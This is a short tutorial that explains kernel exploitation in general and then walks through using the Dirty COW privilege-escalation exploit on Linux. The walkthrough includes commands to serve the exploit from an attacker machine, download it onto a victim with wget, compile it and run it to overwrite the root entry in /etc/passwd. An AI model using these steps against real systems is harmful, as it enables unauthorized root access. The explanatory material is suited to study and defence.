Kernel exploitation refers to the process of taking advantage of vulnerabilities or weaknesses in the kernel of an operating system to execute unauthorized or malicious code. The kernel is the core component of an operating system, managing system resources, providing services to user-level applications, and facilitating communication between hardware and software.
Here are some key points related to kernel exploitation:
Kernel Vulnerabilities:
Security vulnerabilities in the kernel's code can be exploited by attackers to compromise the security of a system. These vulnerabilities may include buffer overflows, privilege escalation flaws, race conditions, or other programming errors.
Privilege Escalation:
One common goal of kernel exploitation is privilege escalation. By exploiting a vulnerability in the kernel, an attacker may gain elevated privileges beyond what is normally allowed. This could lead to full control over the system.
Arbitrary Code Execution:
Successful kernel exploitation often involves executing arbitrary code within the kernel's context. This can be used to manipulate or compromise the system, install malware, or perform other malicious activities.
Impact on System Security:
Kernel exploitation is a serious security threat because compromising the kernel means compromising the core of the operating system. An attacker with control over the kernel can potentially control all aspects of the system.
Mitigation:
To address kernel exploitation, operating system developers release patches and updates to fix identified vulnerabilities. Keeping the system updated with the latest security patches is crucial for mitigating the risk of exploitation.
Kernel Exploit (PoC)
Dirty COW
This exploit uses the pokemon exploit of the dirtycow vulnerability as a base and automatically generates a new passwd line. The user will be prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and overwrites the root account with the generated line. After running the exploit you should be able to login with the newly created user.
This exploit works only for Linux Kernel vs between 2.6.22 and 3.9, we can check this information with cmd: uname -a
We need to transferring it and run into victim machine to give root privilege, compile it with gcc compiler and run it:
#launch python -m SimpleHTTPServer on attacker machine
#download it on victim machine using: wget http://target_IP:8000/dirtycowexploit.c
gcc -pthread dirtycowexploit.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow
This exploit creates a new couple of username and password with root privilege.
After accessing with this credential, we can check user's permission using id or whoami cmd).
